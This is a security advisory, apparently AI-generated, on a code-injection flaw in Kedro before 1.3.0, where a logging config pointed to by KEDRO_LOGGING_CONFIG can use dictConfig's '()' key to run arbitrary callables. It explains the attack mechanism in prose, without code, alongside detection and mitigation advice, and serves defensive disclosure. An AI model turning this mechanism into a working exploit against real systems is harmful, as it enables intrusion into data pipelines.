CVE-2026-35171 Overview
CVE-2026-35171 is a critical Remote Code Execution (RCE) vulnerability in Kedro, a popular toolbox for production-ready data science. Prior to version 1.3.0, Kedro allows the logging configuration file path to be set via the KEDRO_LOGGING_CONFIG environment variable and loads it without proper validation. The logging configuration schema supports the special () key, which enables arbitrary callable instantiation. An attacker can exploit this to execute arbitrary system commands during application startup.
This vulnerability is classified as Code Injection (CWE-94) and represents a severe security risk caused by the unsafe use of logging.config.dictConfig() with user-controlled input.
Critical Impact
Attackers with the ability to set environment variables or control logging configuration files can achieve full remote code execution on systems running vulnerable versions of Kedro, potentially compromising entire data science pipelines and associated infrastructure.
Affected Products
- Kedro versions prior to 1.3.0
Discovery Timeline
- 2026-04-06 - CVE CVE-2026-35171 published to NVD
- 2026-04-07 - Last updated in NVD database
Technical Details for CVE-2026-35171
Vulnerability Analysis
This vulnerability stems from Kedro's handling of logging configuration during application initialization. The framework reads the KEDRO_LOGGING_CONFIG environment variable to determine the path to a logging configuration file and processes it using Python's logging.config.dictConfig() function without adequate input validation.
Python's logging configuration mechanism supports a special () key within handler, filter, and formatter definitions. This key allows specifying an arbitrary callable that will be instantiated when the configuration is loaded. By crafting a malicious logging configuration file and pointing Kedro to it via the environment variable, an attacker can cause arbitrary Python code to execute with the privileges of the Kedro application.
The vulnerability is particularly dangerous because it triggers during application startup, before any security controls within the application itself can take effect. This makes it an effective vector for supply chain attacks and compromising data science workflows.
Root Cause
The root cause is the lack of validation and sanitization when loading user-controllable logging configuration. Kedro trusts the configuration file path specified in the KEDRO_LOGGING_CONFIG environment variable and passes the loaded configuration directly to logging.config.dictConfig(). The dictConfig() function's support for the () key to instantiate arbitrary callables creates a code injection pathway when combined with untrusted input.
Attack Vector
The attack requires an adversary to either control the KEDRO_LOGGING_CONFIG environment variable or place a malicious logging configuration file at a path that Kedro will read. Attack scenarios include:
- Environment Variable Manipulation: In containerized or cloud environments where environment variables may be influenced by external actors
- Malicious Configuration Files: Placing a crafted YAML or JSON logging configuration file in a location where Kedro expects to find one
- Supply Chain Attacks: Compromising dependencies or CI/CD pipelines to inject malicious logging configurations
Once the malicious configuration is loaded, the attacker-specified callable is instantiated, leading to arbitrary code execution. This could be used to establish persistence, exfiltrate sensitive data from data science pipelines, or pivot to other systems.
Detection Methods for CVE-2026-35171
Indicators of Compromise
- Unexpected values in the KEDRO_LOGGING_CONFIG environment variable
- Logging configuration files containing the () key with suspicious callable references
- Unusual process spawning during Kedro application startup
- Modifications to logging configuration files in project directories
Detection Strategies
- Monitor environment variable changes, particularly KEDRO_LOGGING_CONFIG, in production environments
- Implement file integrity monitoring on Kedro project configuration files
- Audit logging configuration files for the presence of the () key with external or suspicious callables
- Use application security testing tools to identify insecure deserialization patterns
Monitoring Recommendations
- Enable process execution logging to detect unexpected child processes spawned by Kedro applications
- Configure alerts for modifications to environment variables in containerized deployments
- Review audit logs for unauthorized access to configuration file directories
- Implement runtime application self-protection (RASP) to detect code injection attempts
How to Mitigate CVE-2026-35171
Immediate Actions Required
- Upgrade Kedro to version 1.3.0 or later immediately
- Audit all KEDRO_LOGGING_CONFIG environment variable settings in production environments
- Review existing logging configuration files for suspicious () key usage
- Restrict write access to Kedro configuration directories
Patch Information
This vulnerability is fixed in Kedro version 1.3.0. The fix implements proper validation of logging configuration to prevent arbitrary callable instantiation through the () key mechanism. Organizations should upgrade to the patched version as soon as possible.
For additional details, refer to the GitHub Security Advisory.
Workarounds
- Remove or unset the KEDRO_LOGGING_CONFIG environment variable and use default logging configuration
- Implement strict file permissions on logging configuration files to prevent tampering
- Use container security policies to prevent environment variable modifications at runtime
- Deploy network segmentation to limit the impact of potential code execution
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
